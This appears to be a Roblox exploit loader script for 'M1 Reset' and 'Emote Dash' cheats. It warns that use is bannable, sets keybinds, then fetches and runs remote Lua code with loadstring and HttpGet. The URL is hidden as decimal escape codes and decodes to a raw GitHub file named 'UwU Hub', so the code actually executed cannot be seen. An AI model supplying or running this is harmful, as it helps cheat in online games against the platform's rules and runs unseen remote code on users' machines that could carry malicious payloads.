-- M1 Reset&Emote Dash Script
--  WARN IT BAN ABLE
-- Set Keybile for Pc here (keycode.[adjusthere])
getgenv().keybinds = {
    m1reset = Enum.KeyCode.R,  -- M1 Reset 
    emotedash = Enum.KeyCode.T, -- Emote Dash
    rotation = Enum.KeyCode.H   -- Auto Rotation
}

loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\83\108\97\112\104\101\108\108\111\47\85\119\85\45\72\117\98\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\85\119\85\37\50\48\72\117\98", true))()

-- New key : cKekdEkRoybwLDhsiVmuDlAUbCLjVmFk251515148/4518/sasolfjsqdjzlqj
